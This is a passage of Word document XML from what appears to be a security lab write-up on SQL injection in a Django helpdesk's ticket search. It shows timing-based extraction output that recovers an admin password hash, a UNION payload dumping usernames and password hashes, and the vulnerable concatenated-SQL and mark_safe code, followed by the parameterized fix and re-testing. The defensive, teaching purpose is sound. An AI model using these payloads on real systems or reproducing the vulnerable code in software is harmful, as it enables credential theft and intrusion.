              <w:t>[58/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="234C0621" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[59/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1v</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3693D50A" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[60/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1va</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6060AB2F" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[61/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaa</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77942002" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[62/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaao</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="089CE930" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[63/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaob</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06AA7EAE" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[64/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55CA7B14" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[65/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53E08C00" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[66/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1D</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6867BEC1" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[67/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F0DDB63" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[68/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEa</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01A646AD" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[69/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62F208ED" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[70/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A4D6122" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[71/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJ</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05945662" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[72/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJX</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C298FD" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[73/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1273DBE8" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[74/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIG</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01C81D64" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[75/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="751C2B17" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[76/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMX</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54AE002D" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[77/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3249A1A1" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[78/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXIC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DCA6AD0" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[79/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="697098C8" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>[80/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA22E17" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[81/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BCEDE61" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[82/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A3607A8" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[83/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45D07865" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[84/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69A795A7" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[85/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D251523" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[86/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH89</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72A8C803" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[87/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH89p</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="500E154C" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[88/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH89pQ</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4753E857" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:r>
              <w:t>[89/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH89pQ=</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79052260" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509"/>
          <w:p w14:paraId="1B9CEEB2" w14:textId="5504B5BC" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>[+] Recovered hash: pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH89pQ=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CCF11C6" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00765509">
        <w:lastRenderedPageBreak/>
        <w:t>5.4 What Was Measured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE9C6B3" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:r w:rsidRPr="00765509">
        <w:t>No part of the response body was ever used as a signal; every response for this endpoint has the same structure and, for the payloads used here, the same reported match count. The only quantity measured was wall-clock elapsed time between issuing each HTTP request and receiving its complete response (captured in the script with time.perf_counter(), and visually confirmed in Burp's response timer). A delay of roughly 2 seconds or more above baseline indicated the injected condition was true, since it meant the pg_sleep(2) branch of the CASE expression had executed; a near-instant response indicated the condition was false. This timing side-channel made it possible to recover the admin password hash one character at a time even though the two possible outcomes were visually indistinguishable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49789EEA" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00765509">
        <w:t>5.5 Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33754156" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:r w:rsidRPr="00765509">
        <w:t xml:space="preserve">The hash recovered through timing alone is identical to the hash extracted directly in Objective 3 and blindly via the match-count oracle in Objective 4: </w:t>
      </w:r>
      <w:r w:rsidRPr="00765509">
        <w:lastRenderedPageBreak/>
        <w:t>pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH89pQ=. Recovering the same value through three independent methods confirms the correctness of the injection and the extraction technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34586146" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00765509">
        <w:t>5.6 Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D989CE3" w14:textId="77777777" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:r w:rsidRPr="00765509">
        <w:t>Objective 5 was achieved. By hiding a conditional pg_sleep() inside the injected query, the response body was kept identical regardless of the truth of the injected condition, forcing all inference onto a timing side-channel. An automated script measuring response latency recovered the administrator's full password hash one character at a time using only elapsed time, with no visible difference in any response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37114D9C" w14:textId="30A39C29" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21894">
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDB2CC5" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E21894">
        <w:t>6.1 Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5145E7" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:r w:rsidRPr="00E21894">
        <w:t>All five objectives exploited a single line in advanced_ticket_search() (src/helpdesk/views/staff.py), the view backing the "Advanced Ticket Search" feature. The user-supplied search term was concatenated directly into a raw SQL string with Python's + operator before being executed:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E21894" w:rsidRPr="00E21894" w14:paraId="27F83839" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4E4"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64F37B91" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>sql = (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BD862E8" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t xml:space="preserve">    "SELECT id, title, submitter_email, status "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67575A6F" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t xml:space="preserve">    "FROM helpdesk_ticket "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D3553C8" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t xml:space="preserve">    "WHERE title LIKE '%" + term + "%' "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21DBD203" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t xml:space="preserve">    "ORDER BY created DESC"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="091472F8" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="708B3835" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>cursor.execute(sql)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7891BCFE" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E21894">
        <w:t>Because term (taken directly from request.GET["q"] with no validation) was spliced into the SQL text itself, a single quote in the search box could break out of the intended string literal and inject arbitrary SQL, which is what every payload in Objectives 1 through 5 relied on. The same view also wrapped the term in mark_safe() before rendering it back into the page, disabling Django's automatic HTML escaping for fully attacker-controlled input; this is a secondary, independent XSS vulnerability in the same function, fixed at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0C57C2" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E21894">
        <w:t>6.2 The Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168F6E24" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:r w:rsidRPr="00E21894">
        <w:t>The fix uses a parameterized query: the SQL text contains a placeholder (%s) instead of the value, and the value is passed separately to cursor.execute() as a parameter. The database driver sends the query and the value over two different channels, so Postgres always treats the value as data, never as executable SQL, regardless of what characters it contains. The unsafe mark_safe() call on the echoed search term was also removed, restoring Django's default auto-escaping.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E21894" w:rsidRPr="00E21894" w14:paraId="18B69A4C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E3F2E3"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17812B8E" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>sql = (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51709D35" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t xml:space="preserve">    "SELECT id, title, submitter_email, status "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="684BE40D" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t xml:space="preserve">    "FROM helpdesk_ticket "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4278B2D8" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    "WHERE title LIKE %s "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B71E66E" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t xml:space="preserve">    "ORDER BY created DESC"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BA1DB42" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B654FE4" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>cursor.execute(sql, [f"%{term}%"])</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="304A1F7D" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E21894">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Named change: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21894">
        <w:t>replaced string concatenation ('%" + term + "%') with a parameterized placeholder (%s, with the wildcarded value passed as a separate argument to cursor.execute()), and removed the mark_safe() call that had disabled output escaping on the same field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A6DBFF" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E21894">
        <w:t>6.3 Re-Testing: Before and After</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A529A74" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:r w:rsidRPr="00E21894">
        <w:t>The Objective 3 UNION payload was resent unchanged against the patched application.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E21894" w:rsidRPr="00E21894" w14:paraId="52091EFD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DFC45A7" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>q=zzzz' UNION SELECT NULL,username || ':' || password,NULL,NULL FROM auth_user--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42F6AB8C" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E21894">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Before (Objective 3, vulnerable code): </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21894">
        <w:t>the response returned 4 matches, one row per staff account, each showing the username and full password hash (see Figure 3.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1FF952" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:r w:rsidRPr="00E21894">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">After (patched code): </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21894">
        <w:t>the identical payload returned "0 matches." The single quote in the search term is now treated as a literal character inside the parameterized value rather than SQL syntax, so no UNION ever executes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AC8200" w14:textId="5BD8CE73" w:rsidR="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:r w:rsidRPr="00E21894">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE428B5" wp14:editId="1C289495">
            <wp:extent cx="6858000" cy="3238500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="65086727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858000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF6280A" w14:textId="7806912F" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 6.3: After – Objective 3 UNION payload against the patched code, now returning 0 matches instead of 4 staff credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4115554E" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E21894">
        <w:t>6.4 Confirming Every Objective Now Fails</w:t>
      </w:r>
    </w:p>
